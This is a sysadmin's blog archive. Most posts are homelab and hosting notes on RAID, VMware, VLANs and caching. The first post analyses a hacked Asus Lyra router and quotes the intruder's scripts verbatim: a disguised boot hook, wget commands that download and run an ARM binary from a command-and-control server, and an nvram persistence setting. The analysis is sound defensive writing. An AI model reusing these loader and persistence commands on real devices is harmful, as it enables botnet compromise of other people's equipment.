All posts by admin

Routers are secure, right? Asus Lyra hacked.

We take the small things for granted in life.
Like, say breathing. Or, the security on our embedded network devices…

As our devices become more and more complicated and sophisticated, we use them in the hope that their security features are becoming more advanced at the same time.
Sure, sometimes we’ll be okay, but other times we are at risk of getting caught out by poor security defaults and a lack of user education, which can cause a nightmare in the world of “Always on” and internet-connected everything.

While staying with family in the middle of a world-wide pandemic (thanks Covid-19), I was messing around with the Asus Lyra I’d given them a while back.
It’s a great and powerful ARM + Linux based WiFi mesh system with plenty of features to explore, and it’s a near-perfect setup for power users, while still being somewhat user friendly.


Bad Sign #1.

So, every once in a while, the main mesh node (I’ll say “router” here, as it’s the node connected to the internet gateway) seemed to lock up and die. I’d seen this first hand, and wondered whether there was a hardware problem unique to the main node. The lights are on, but there is no one home. All internet connectivity dies, and a reboot is required to get anything working again. All the other nodes in the mesh flash a red status light, indicating a mesh failure, while the main node still shows a healthy blue even though it is totally locked up and inaccessible via either LAN cable or the WiFi of the other nodes.

All of the other Lyra deployments I have used before, of the exact same model, work perfectly and I’ve never really faced this kind of problem before. The system has the tendency to “just work”.
Just before the death of the main node, things would seem slow and sluggish for internet users. Packet loss would creep up, and if left long enough, the main node would die totally.
Once the main node was rebooted, each other Lyra node needed a manual reboot too in order to rejoin the mesh (again, not something I’ve experienced on other Lyra systems I used previously).

During the “build up” in packet-loss before the node died, I did on occasion note a higher than expected memory usage if I checked the web interface, which I half-ass attributed to some of the extra features of the Lyra running in the background.

Bad Sign #2.

In this location, a Ring doorbell and camera system is deployed. It’s a handy little WiFi-connected camera system that allows you to check who is knockin’.

Some time ago, we noticed when trying to use either the Ring app, or even the Ring website, you’d get a straight blocked message, or, the app would mention there was a network problem.
I had provided evidence to Ring Support that there was a problem on their side, and that they had been blocking our access to this fancy tech they’ve sold us at a premium.

Sadly, the first consultant was in way over his head. Then the second “escalation” consultant was arguably even worse, although they at least requested screenshots of the issue via email, which was ultimately ignored anyway.

Visiting ring.com would produce a 406 Not Acceptable

After not being able to get anything productive out of them, and being pushed from agent to agent, we gave up trying, and I suggested my family ask their ISP for a new static IP address.

The discovery!

Jump forward 100 or-so days of lock-down, I decided to try my hand at getting the Lyra to auto-reboot on a schedule. My plan was that if it rebooted often, perhaps it wouldn’t lock up on the odd occasion. I was spurred on by the fact that it runs Linux, and presents an SSH connection. You can do ANYTHING on Linux! Right?

Logging in and stumbling around, I noticed there was a very small /jffs partition holding the only files that persist across a reboot. This was mainly used for security signature versions, DHCP configs, boring stuff. However, there was a sub-directory called “scripts”. Perfect!

Googling this device, I tried some user-script options that are included with the Asuswrt-Merlin packages, but that’s a custom spin on the official Asus firmware, which doesn’t support the Lyra.

Any files I created within the /jffs/scripts/ directory didn’t do anything, and it seemed like that might be a dead end.

I decided to take a look at the only file I found by default in this directory, which had the full path “/jffs/scripts/openvpn-event”.
Checking the content, something didn’t seem right… This is a weird way for OpenVPN to do something. Plus, OpenVPN isn’t even configured!

#!/bin/sh
cd /tmp
cp /jffs/runtime.log upgrade.sh
sh upgrade.sh &

Looks innocent at first glance, but why does a log file later become upgrade.sh…?
When checking /jffs/runtime.log, I start to worry:

#!/bin/sh
rm $0
if [ `ps|grep upgrade.sh|wc -l` -gt 3 ]; then
exit
fi
sleep 120
cd /tmp
wget --no-check-certificate https://IP_FROM_INDONESIA/314/o2.sh -O /tmp/chkupdate.sh
sh /tmp/chkupdate.sh &

I’m no security expert, but having worked at a fair few shared hosting companies, I know when a Linux script looks a little dodgy. Since by now we’re getting super dodgy, I’m going deeper, /tmp/chkupdate.sh:

#!/bin/sh
rm $0
cd /tmp
wget --no-check-certificate https://IP_FROM_INDONESIA/as/as.armv5te -O /tmp/update
wget --no-check-certificate https://IP_FROM_INDONESIA/314/.update5.log -O /tmp/.update.log
chmod 777 /tmp/update
/tmp/update &

/tmp/update is obfuscated or compiled, so I can’t read it, but here is .update.log:

IP_FROM_INDONESIA
443
/314/check5.php
/tmp/stop.txt
43200
60
1

Well, hell. We’re hacked, folks!
I noticed the structure of this file looked a bit like the pieces of a URL, so I built a web call out of it to grab check5.php from the bot’s command-and-control server. I got this basic file back; I guess they don’t want to attack anyone right now:

rm $0
sleep 10
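
The web call described above can be sketched roughly like this. It assumes the first three lines of .update.log are host, port and path (the file itself doesn't label them, and the remaining lines are left alone). build_url is a made-up helper name, purely for illustration:

```shell
#!/bin/sh
# Sketch only: build_url is a hypothetical helper, and the meaning of the
# fields (line 1 = host, line 2 = port, line 3 = path) is an assumption.
build_url() {
    conf="$1"
    host=$(sed -n '1p' "$conf")
    port=$(sed -n '2p' "$conf")
    path=$(sed -n '3p' "$conf")
    printf 'https://%s:%s%s\n' "$host" "$port" "$path"
}

# Usage, on a copy of the file (read what comes back, never run it):
#   wget --no-check-certificate -O check5.txt "$(build_url ./update.log.copy)"
```

Saving the response to a file with -O, rather than piping it into sh like the bot does, keeps it at arm's length while you read it.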

Are we actively hacked though? Are these scripts running?
Checking the basic netstat output provided with the BusyBox shell, I don’t see any open ports I don’t recognise.

But, while checking the ps output of the system, I can see “update” is running, and it continues to loop the file above. Without strace, it’s hard to tell what exactly is going on…
Great! But what gives? I can’t find any signs of how the attacker even managed to run a custom script at all, let alone an elaborate bot! I was trying to do this very thing myself.

A little googling later, and I found an nvram option on the Lyra. This is where important configs are saved and persisted across reboots. The one of interest was an option previously unknown to me, jffs2_scripts:

# nvram get jffs2_scripts
1

And here was where you set your custom script that will execute on a reboot:

# nvram show |grep script
size: 31964 bytes (29476 left)
jffs2_exec=sh /jffs/scripts/openvpn-event
script_usbhotplug=
script_usbmount=
jffs2_scripts=1
script_usbumount=

Got ya!
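
If you want to check your own router for the same kind of hook, a small filter over the nvram output is enough. This is only a sketch: nonempty_script_hooks is a made-up name, and the key names are simply the ones that showed up in the output above, so other firmware versions may well use different ones.

```shell
#!/bin/sh
# Sketch only: nonempty_script_hooks is a hypothetical helper name.
# Reads "nvram show" style key=value lines on stdin and prints only the
# script hooks that actually have a command set (empty ones are skipped).
nonempty_script_hooks() {
    grep -E '^(jffs2_exec|script_[a-z]+)=.+'
}

# Usage on the router (assuming its BusyBox grep supports -E):
#   nvram show 2>/dev/null | nonempty_script_hooks
```

Anything this prints that you didn't set yourself deserves a closer look.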

I notice the USB options here too. I had previously seen a dirty hack to inject a script on reboot by making use of a USB port on the router, but that was far too disgusting to even consider. Having to plug in a USB device on each reboot didn’t sound like a good idea.

So, how did this happen?

It’s not clear! The logs don’t persist for very long, and are cycled on every reboot. Looking at the dates on the files, /jffs/scripts/openvpn-event had a create date of November 2019, which could easily be faked, but did look like a plausible date of entry for a hacker.
Sadly, no logs persisted long enough to get close to revealing the source of the intrusion, but it might not be of much value anyway.

My current deduction is that sometime between November and now, likely on setup of the device, the default password was still in use and the firewall was not enabled, allowing for an easy entry via the SSH service running on the device.

If this poor router had been used in DDoS attacks like a brainless zombie roaming the internet, it’s no wonder poor Ring had decided to take a break from talking to us for a while.

Update – 19/08/20
In case it isn’t clear what to do in this kinda situation: do a factory reset of your Asus Lyra if you believe it was hacked, or even go as far as downloading the firmware from Asus directly and re-flashing it. Having spent a few days trying to clean up the infection, I kept finding more and more firewall rules blocking updates, and other strange things. Just reset it! 🙂

FakeRAID, Linux, and R1Soft

FakeRAID and Linux aren’t really friends.

What is fakeRAID?
In the last few years, a number of hardware products have come onto the market claiming to be IDE or SATA RAID controllers. These have shown up in a number of desktop/workstation motherboards and lower-end servers. Virtually none of these are true hardware RAID controllers. Instead, they are simply multi-channel disk controllers combined with special BIOS configuration options and software drivers to assist the OS in performing RAID operations. This gives the appearance of a hardware RAID, because the RAID configuration is done using a BIOS setup screen, and the operating system can be booted from the RAID. With the advent of Terabyte disk drives, FakeRAID is becoming a popular option for entry-level small business servers to simply mirror 2 1.5 TB drives, and dispense with an expensive hardware RAID 5 array.

Older Windows versions required a driver loaded during the Windows install process for these cards, but that is changing. Under Linux, which has built-in softRAID functionality that pre-dates these devices, the hardware is normally seen for what it is — multiple hard drives and a multi-channel IDE/SATA controller. Hence, fakeRAID.

Source: https://help.ubuntu.com/community/FakeRaidHowto

As above, your BIOS RAID normally can’t be seen in Linux. Instead, you’ll have your normal /dev/sd[abc] disks, which proves challenging.

Historically, there has been no need to use the BIOS RAID with Linux, as MDADM has done a good enough, or even better, job. That is, until a unique use-case came up.

R1Soft by Idera provides file-level and block-level backups via their software. It works rather well, and has a bare-metal agent to boot into when you run into a rock and need your data for some reason.
We wanted to test a restore of a physical Windows server. Normally that is just 2 x 1TB disks in a software RAID 1 mirror, which would be easy enough to do: boot to the rescue restore CD, point to a disk, and shoot, then just re-add your second disk to the RAID. But in this case, the client had 3 x 1TB disks in RAID 5, so a single disk restore wasn’t an option.

We needed the FakeRAID to hand over a 1.8TB disk to the restore agent in order to send over the data, and Linux doesn’t see our FakeRAID. An easy fix would be to slot in a RAID card, or, a single 2TB disk for the sake of the restore, but, Douglas said half-jobs are bad.
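
For anyone wondering where a figure like 1.8TB comes from with 3 x 1TB disks, here is the arithmetic as a quick sketch. It assumes the 1.8 figure is the binary (TiB) size an OS reports for 2 decimal TB, which is a guess on my part; raid5_usable_tib is a made-up helper name.

```shell
#!/bin/sh
# Sketch only: raid5_usable_tib is a hypothetical helper name.
# RAID 5 spends one disk's worth of space on parity, so usable space is
# (disks - 1) * disk size. Input size is decimal TB; output is binary TiB.
raid5_usable_tib() {
    awk -v n="$1" -v tb="$2" \
        'BEGIN { printf "%.2f\n", (n - 1) * tb * 1e12 / (2 ^ 40) }'
}

raid5_usable_tib 3 1   # prints 1.82
```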

“Paul Marrapese” wrote a great article, “Arch Linux and Intel RST (“Fake RAID”)”.
In the article, he writes about creating your RAID in Linux by telling MDADM to use external metadata, and that actually works perfectly; the RAID is even detected by the RST BIOS ROM. But in the Ubuntu rescue CD, it was totally unusable. The RAID remained resync pending, and read-only. Nothing I could think of could get the RAID r/w.

I blame the Ubuntu version the CD is running, the modules compiled with it, or something.

Moving on, booting into a CentOS 7 Live Rescue, it detects and starts the RAID volume and even starts the resync without any prompt, and read/write. So we’re gonna need to find a way to do it from here.

FakeRAID seems to work out the box with CentOS 7’s rescue environment!

YUM isn’t really usable on the live ISO, so installing the R1 Agent here isn’t really an option.
I decided to mount my CD to the second media port via the BMC on the server, and get a CHROOT into the rescue CD. That worked, and my R1 Agent could start, but a CD is read-only, so services couldn’t start correctly, so this wasn’t gonna work.
How did they get the system rw on the bootable restore? Let’s go back and see:

Here we see our root volume is overlayfs, WTF is that?!

OverlayFS provides a great way to merge directories or filesystems such that one of the filesystems (called the “lower” one) never gets written to, but all changes are made to the “upper” one. This is great for systems that rely on having read-only data, but the view needs to be editable, such as Live CD’s and Docker containers/images (image is read only). This also allows you to quickly add some storage to an existing filesystem that is running out of space, without having to alter any structures. It could also be a useful component of a backup/snapshot system.

https://blog.programster.org/overlayfs

Right, that makes perfect sense! You have a read-only volume, and a scratch area where all the differences are saved. Above, we see the CD on /dev/loop0 is mounted to /rofs, read-only. Magic?

Let’s get back to CentOS then and see if we can make this work. An example on the link above shows how we can get it going:

Mount it!

Once our filesystem is read-write, we do the usual mounting of sys, proc and dev, then we chroot into our rw filesystem, configure our IP addresses, and start the CDP agent.
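
The overlay mount and chroot steps described here can be sketched along these lines. All of the paths (/mnt/ro, /mnt/scratch, /mnt/rw) are hypothetical stand-ins, not the ones used on the day, and overlay_opts is a made-up helper that only builds the option string; the actual mount commands are left as comments because they need root and a real read-only source.

```shell
#!/bin/sh
# Sketch only: overlay_opts is a hypothetical helper and every path used
# in the usage notes is a placeholder.
overlay_opts() {
    # $1 = read-only lower dir, $2 = writable upper dir, $3 = overlay work dir
    printf 'lowerdir=%s,upperdir=%s,workdir=%s\n' "$1" "$2" "$3"
}

# Usage (as root), with the rescue CD contents already mounted on /mnt/ro:
#   mkdir -p /mnt/scratch /mnt/rw
#   mount -t tmpfs tmpfs /mnt/scratch
#   mkdir -p /mnt/scratch/upper /mnt/scratch/work
#   mount -t overlay overlay \
#       -o "$(overlay_opts /mnt/ro /mnt/scratch/upper /mnt/scratch/work)" /mnt/rw
#   for fs in proc sys dev; do mount --bind "/$fs" "/mnt/rw/$fs"; done
#   chroot /mnt/rw /bin/sh
```

The upper and work directories have to live on the same filesystem, which is why both sit under the one tmpfs scratch mount here.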

Yay!

Now we get back to R1Soft’s web UI, point to our agent, restore partitions to the FakeRAID, and run the restore.

Job done.

Linux Raid Mdadm lockout.

MDADM – Multiple Device Admin. Apparently.

Sometimes, you wanna trash your RAID. But Linux starts it up while you’re not looking, and locks your block devices.

In a terminal, let’s break it.
sudo -i
Here we become root, not user.

cat /proc/mdstat
Here, we can see our RAID devices that are started, e.g. md126, md127 etc.

mdadm --manage --stop /dev/md127
Here, we manage the device, and use the stop flag, telling MDADM to stop the raid device. With this done, now we can work on the underlying disks. You’ll need to do this for each raid device.
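
If there are a few arrays to stop, the "do this for each raid device" part can be looped. A minimal sketch, assuming the usual /proc/mdstat layout where each array line starts with its md name; md_devices is a made-up helper name:

```shell
#!/bin/sh
# Sketch only: md_devices is a hypothetical helper name.
# Reads /proc/mdstat style text on stdin and prints each md device name.
md_devices() {
    awk '/^md[^ ]* :/ { print $1 }'
}

# Usage (as root):
#   for md in $(md_devices < /proc/mdstat); do
#       mdadm --manage --stop "/dev/$md"
#   done
```

mdadm can also do this in one go with mdadm --stop --scan, which tries to stop every array it can.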

Have fun.

CPanel NGINX hack-mirror, sometimes breaks

We had a few clients complaining about corrupted downloads from our mirror when trying to run upcp, the CPanel update, so I checked it out.

It looks like the NGINX proxy cache had corruption: the file “http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz” was invalid, and corrupted according to the expected checksum.

I’ve double checked the health of the cpproxy, and it seems okay, although it was rebooted recently, so I may not have been the first one to look at the issue.
I can see from the logs that we served a cached “HIT” to the client’s box.

15x.0.165.4 - - [18/Jan/2018:00:52:27 +0200] "GET /cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz HTTP/1.1" 200 1026207 "-" "HTTP-Tiny/0.068" "-" "Cache-Status:HIT"
There were 10 attempts from his box, as well as some others from other boxes at the time.

We last “missed” an attempt to get this file at the following date:
access.log-20180116.gz:15x.0.160.155 - - [16/Jan/2018:01:32:08 +0200] "GET /cpanelsync/11.66.0.34/binaries/linux-c7-x86_64/bin/setsiteip.xz HTTP/1.1" 200 2122005 "-" "HTTP-Tiny/0.068" "-" "Cache-Status:MISS"

At this point we could assume it was cached on this MISS.
This means anyone wanting to do an UPCP through the proxy since this date would be sad.

I have taken the exact file the client complained about, and checked whether the cache has since expired and re-downloaded the file.

I downloaded our cache’s file to “CACHE”:
root@alyx:~/cp# wget -O CACHE http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
--2018-01-18 22:42:32-- http://cpproxy.afrixx.com/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
Resolving cpproxy.afrixx.com (cpproxy.afrixx.com)... 1xx.242.144.85
Connecting to cpproxy.afrixx.com (cpproxy.afrixx.com)|1xx.242.144.85|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/x-xz]
Saving to: ‘CACHE’

CACHE [ <=> ] 1.32M --.-KB/s in 0.07s

2018-01-18 22:42:32 (19.1 MB/s) - ‘CACHE’ saved [1383264]

And I downloaded the CPANEL Mirror’s version to NON-CACHE:

root@alyx:~/cp# wget -O NON-CACHE http://httpupdate.cpanel.net/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
--2018-01-18 22:42:52-- http://httpupdate.cpanel.net/cpanelsync/11.68.0.26/binaries/linux-c7-x86_64/bin/setsiteip.xz
Resolving httpupdate.cpanel.net (httpupdate.cpanel.net)... 67.159.2.2, 67.205.110.4, 208.109.109.239, ...
Connecting to httpupdate.cpanel.net (httpupdate.cpanel.net)|67.159.2.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/x-xz]
Saving to: ‘NON-CACHE’

NON-CACHE [ <=> ] 1.32M 871KB/s in 1.6s

2018-01-18 22:42:54 (871 KB/s) - ‘NON-CACHE’ saved [1383264]

When we compare the files’ md5 checksums, I can see the files are the same:

root@alyx:~/cp# md5sum NON-CACHE
401dbed2bd9075e2896e596738163437 NON-CACHE
root@alyx:~/cp# md5sum CACHE
401dbed2bd9075e2896e596738163437 CACHE
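
The same comparison can be wrapped up so it is easy to re-run the next time someone complains. A small sketch, with same_md5 being a made-up helper name:

```shell
#!/bin/sh
# Sketch only: same_md5 is a hypothetical helper name.
# Succeeds (exit 0) when both files have the same md5 checksum,
# fails with 1 when they differ, and with 2 when a file can't be read.
same_md5() {
    a=$(md5sum < "$1") || return 2
    b=$(md5sum < "$2") || return 2
    [ "$a" = "$b" ]
}

# Usage:
#   same_md5 CACHE NON-CACHE && echo "cache copy matches upstream"
```

Reading each file on stdin keeps the filename out of the md5sum output, so the two strings can be compared directly.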

I’ve also run an upcp on a different box that is pointing to our cache, and it seems to be fine.

I’ll assume the cache expired and the file rotated, clearing the error condition.

Mew

VMWare and Bonding…

So, I have a little VMWare stack at home: 2 x physical systems with 2 x 1Gbps eth each…

I configured the ports as LACP LAGs, for MAOR BANDWIF. And because I have a switch that can do it so why not?

I had previously setup my NICs on the VMWare side as follows:
Yet something wasn’t quite correct. These LAGs were set as uplinks for the switch, but if I were to ping something in my home, say a gateway, I would get DUPs:
===
64 bytes from 192.168.1.1: icmp_seq=1736 ttl=64 time=0.268 ms
64 bytes from 192.168.1.1: icmp_seq=1736 ttl=64 time=0.281 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1737 ttl=64 time=0.361 ms
64 bytes from 192.168.1.1: icmp_seq=1737 ttl=64 time=0.376 ms (DUP!)
===

This was strange. I ignored it for a little. Then when trying to work on another project I was getting packet issues talking to a VM, and I got annoyed. I spent a good hour trying to stumble around the VMWare WEB UI, which I thought was hiding the answers I seek.

After a while I decided to check the switch instead. Perhaps something isn’t quite correct there? AHA!
A dump of the active LAGs on my Extreme is:

And there it is, Trunk group 1 had only 1 x member, leaving the other to just act as another access port.
A quick fixie:

And we could see straight away that all was good, as the DUPs stopped part-way through the running ping:
64 bytes from 192.168.1.1: icmp_seq=1741 ttl=64 time=0.405 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1742 ttl=64 time=0.372 ms
64 bytes from 192.168.1.1: icmp_seq=1742 ttl=64 time=0.394 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1743 ttl=64 time=0.343 ms
64 bytes from 192.168.1.1: icmp_seq=1743 ttl=64 time=0.403 ms (DUP!)
64 bytes from 192.168.1.1: icmp_seq=1744 ttl=64 time=0.454 ms
64 bytes from 192.168.1.1: icmp_seq=1745 ttl=64 time=0.279 ms
64 bytes from 192.168.1.1: icmp_seq=1746 ttl=64 time=0.355 ms
64 bytes from 192.168.1.1: icmp_seq=1747 ttl=64 time=0.318 ms
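
A quick way to keep an eye on this without staring at the scroll is to count the duplicate replies. A tiny sketch, assuming your ping marks duplicates with (DUP!) the way the output above does; count_dups is a made-up helper name:

```shell
#!/bin/sh
# Sketch only: count_dups is a hypothetical helper name.
# Counts ping reply lines on stdin that are flagged as duplicates.
count_dups() {
    # grep -c still prints 0 when nothing matches, but exits non-zero,
    # so the "|| true" keeps the helper's exit status clean.
    grep -c -F '(DUP!)' || true
}

# Usage:
#   ping -c 20 192.168.1.1 | count_dups
```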

rAge Cape Town 2016


So, with the event fast approaching, planning is well under way for rAge Cape Town 2016.

Sadly, the event is fairly small this year, with only a few hundred gamers, which means there is a limited budget. This is still okay; I will be paying my way and heading down to join the set-up on the 17th.

Again, Intel has sent over some amazing servers for the event.
They sent over 2 x boxes for the cache setup, each of which has:
2 x E5-2690v2 @ 3.00GHz
20 cores and 40 threads
50MB of L3 cache
5MB of L2 cache
1.3MB of L1 cache
192GB of RAM, for a real nice hot cache.
2.5TB of SSDs, in RAID0.
At least 7 x 1Gbps NICs
We can change the config as desired….

Looking at last year’s specs, it looks like the set-up is actually the same, but with more SSDs.

I am waiting to see what IS will be bringing to the party for an Internet Connection, but I am sure it will be something exciting.

Pics and more info to follow 🙂

SERIAL KILLER

A long while back, a friend of mine gave me a 24 Port 10/100 3COM switch.
It was quite nice of him, but I couldn’t get access to this switch.

It had a management port on it, so I had to go out and buy a NULL-MODEM adapter to use it.

It looks just like this:


And at last, I was able to gain access to the switch and reset it, so I could get into its Web UI.

I got over this switch very shortly afterwards. It was only 10/100, so I put it aside.

Here we are 2 or so years later, and I have been donated a massive load of servers + switches from an old call center.
It’s really enterprise-grade stuff.

I found myself doing a scan of 10.0.0.0/8 trying to get into the switches again, and came up short.

Off to the old drawers to find the handy NULL-MODEM hack connection, and we have a winner! Default password too.

However, these switches aren’t so easy, and most commands have to be done via the CLI, which is amazing. I do not know the link between Extreme Networks and Cisco, but they are VERY similar.

These switches will help with my CCNA!
I plan to add a lot more stuff once I get up and running with the rest of the hardware we now have. We have over 10 new servers to play with!

VLAN much?

So, in my own setup at home, I had a lot of physical stuff.

I had 1 x PC with PFSense, and that had 3 x NICs.
Then I had 1 x NAS server with a few drives in it, running FreeNAS.
And a VMWare host running ESXi, for small projects.

So I took the PFsense and put it on the ESXi host, which got rid of some of the hardware I had to have sitting around, but this created a problem on its own.

I have 2 x ADSL routers, and I need to do a PPPOE out of each.
I have to dial out of each, and try to separate them somehow, so that PFSense doesn’t do 2 x PPPOE connections through the same router.

And after a weekend of Googling, blood, tears, etc, I got it right.

In VSphere, I created a port group for the WAN interface the PFSense box will use, and set its VLAN ID to 4095. That passes all VLAN tags through to the VM, so PFSense is able to be in whatever VLAN it wants.

Then I was able to create 2 VLAN interfaces inside PFSense: VLAN 2 and VLAN 3.
These were then set up on my managed switch, and I added the ports of the ADSL routers to these VLANs, so that they were able to talk to VLAN 2 and 3 respectively.

This seemed to work, and the PFSense was now able to talk to each router in its own VLAN.

Then in PFSense, we just added the PPPOE and told it to dial over the VLAN, so that it wouldn’t get mixed up with the other modem, and boom. Done!

The most complicated part was trying to work out how to set up my managed switch. Its VLAN setup confused me with its tagging options etc, but I was eventually able to figure it out, and it all works in pure harmony 🙂

WAIT!

Who wants to wait around for other people/things?

Definitely not your cache server, and if it is waiting around, then there could be a problem somewhere.

See my case below:
[Graphs: system1z.1day, kern1z.1day]
The server has only 4 CPUs, and its load average is almost double that.
Wow, why is there so much work happening on the CPU? What could it be processing that is causing such high load?

Nothing. The Answer is ZERO.
It isn’t doing a thing, but it is rather, waiting.

If you take a look at the Kernel Usage graph, we see that we are waiting. A lot. This is due to the disks in this high-demand cache really not being able to keep up with the load they’re expected to handle: serving a lot of content to a country of users.
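
Without the graphs, the same two numbers can be pulled from a shell. This is a rough sketch, assuming a Linux box with /proc available; both helper names are made up, and the iowait figure is an average since boot rather than a live reading.

```shell
#!/bin/sh
# Sketch only: both helper names are hypothetical.

# Load average divided by CPU count; well above 1.00 means work is queuing.
load_per_cpu() {
    awk -v load="$1" -v cpus="$2" 'BEGIN { printf "%.2f\n", load / cpus }'
}

# Rough share of CPU time spent in iowait, taken from the aggregate "cpu"
# line of /proc/stat style input on stdin. Column 6 is iowait (after the
# "cpu" label, user, nice, system and idle). Columns 2-9 are summed for
# the total; the counters are totals since boot.
iowait_pct() {
    awk '$1 == "cpu" { for (i = 2; i <= NF && i <= 9; i++) total += $i
                       printf "%.1f\n", $6 * 100 / total }'
}

# Usage on a Linux box:
#   load_per_cpu "$(cut -d' ' -f1 /proc/loadavg)" "$(nproc)"
#   iowait_pct < /proc/stat
```

A high load-per-CPU figure together with a high iowait share is the "busy doing nothing" pattern described here.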

Poor thing.

As it stands, this box has 3 x 3TB drives in it, striped for ghaddagofast speeds. But it still isn’t enough. The actual transfer rates seem okay and don’t look like the bottleneck; the problem is rather the IOPS the drives are expected to serve.

This problem could be EASILY solved with 1 x SSD. Seriously easily, and a little $$.
But $$ isn’t always on your side. People like their $$$.

So we have to use what is around, which in this case is a lot of servers and magnetic drives.

Cool, we can just pop some more HDDs into the server, can’t we?
Wrong.

The server is 1U big with 3 bays as is. There is no space.

So now, we plan stuff. We need to make a plan. Or we scrap the project.

So we get 2 x of the Old servers.
These can take 3 x Drives each. We populate the bays.

We then install FreeNAS, because I quite enjoy using it and it sends me emails, which I quite like.
It also supports iSCSI, which we plan to use to share the drives over 2 x 1Gbps NICs.

iSCSI, which stands for Internet Small Computer System Interface, works on top of the Transmission Control Protocol (TCP) and allows SCSI commands to be sent end-to-end over local-area networks (LANs), wide-area networks (WANs) or the Internet.

Will it work? I hope so. If it doesn’t work after this, that really is kinda sucky.

Time will tell, right?